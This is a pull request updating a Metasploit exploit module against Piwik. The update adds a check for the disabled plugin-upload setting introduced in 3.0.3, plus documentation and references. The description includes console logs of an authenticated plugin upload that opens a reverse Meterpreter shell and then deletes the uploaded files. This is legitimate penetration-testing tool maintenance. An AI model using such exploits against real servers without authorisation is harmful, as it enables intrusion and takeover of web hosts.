### PR TITLE
update piwik module

### DIFF
--- a/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md
+++ b/documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md
@@ -5,6 +5,8 @@ Older builds are also available from [builds.piwik.org](https://builds.piwik.org
 
 This module was tested with Piwik versions 2.14.0, 2.16.0, 2.17.1 and 3.0.1
 
+Piwik disabled custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you have to enable custom plugin uploads via the config file.
+
 ## Verification Steps
 
 ### Install Piwik (Debian/Ubuntu)

--- a/modules/exploits/unix/webapp/piwik_superuser_plugin_upload.rb
+++ b/modules/exploits/unix/webapp/piwik_superuser_plugin_upload.rb
@@ -20,7 +20,9 @@ class MetasploitModule < Msf::Exploit::Remote
           This module will generate a plugin, pack the payload into it
           and upload it to a server running Piwik. Superuser Credentials are
           required to run this module. This module does not work against Piwik 1
-          as there is no option to upload custom plugins.
+          as there is no option to upload custom plugins. Piwik disabled
+          custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you
+          have to enable custom plugin uploads via the config file.
           Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.
         },
       'License'         => MSF_LICENSE,
@@ -30,7 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'      =>
         [
-          [ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ]
+          [ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ],
+          [ 'URL', 'https://piwik.org/faq/plugins/faq_21/' ],
+          [ 'URL', 'https://piwik.org/changelog/piwik-3-0-3/' ]
         ],
       'DisclosureDate'  => 'Feb 05 2017',
       'Platform'        => 'php',
@@ -314,6 +318,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     upload_nonce = nil
     if res && res.code == 200
+      if res.body =~/Plugin upload is disabled in config file/
+        fail_with(Failure::NotVulnerable, 'Custom plugin uploads are disabled')
+      end
+
       match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m)
       if match
         upload_nonce = match[1]
@@ -362,4 +370,3 @@ class MetasploitModule < Msf::Exploit::Remote
     }, 5)
   end
 end
-


### PR DESCRIPTION
Piwik disabled custom plugin uploads in 3.0.3.
See https://piwik.org/changelog/piwik-3-0-3/ for details

This adds a check to see if plugin uploads are disabled

```
msf exploit(piwik_superuser_plugin_upload) > run

[*] Started reverse TCP handler on 10.211.55.2:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using piwik:password...
[+] Authenticated with Piwik
[*] Checking if user piwik has superuser access
[+] User piwik has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.3
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin lVZAkDBMal generated
[*] Uploading plugin
[-] Exploit aborted due to failure: not-vulnerable: Custom plugin uploads are disabled
[*] Exploit completed, but no session was created.
msf exploit(piwik_superuser_plugin_upload) > run

[*] Started reverse TCP handler on 10.211.55.2:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using piwik:password...
[+] Authenticated with Piwik
[*] Checking if user piwik has superuser access
[+] User piwik has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.3
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin UHHGfyaMqv generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 10.211.55.21
[*] Meterpreter session 1 opened (10.211.55.2:4444 -> 10.211.55.21:59990) at 2017-04-05 20:18:33 +0200
[+] Deleted plugins/UHHGfyaMqv/plugin.json
[+] Deleted plugins/UHHGfyaMqv/UHHGfyaMqv.php

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.19.0-64-generic #72~14.04.1-Ubuntu SMP Fri Jun 24 17:59:48 UTC 2016 x86_64
Meterpreter : php/linux
meterpreter >
```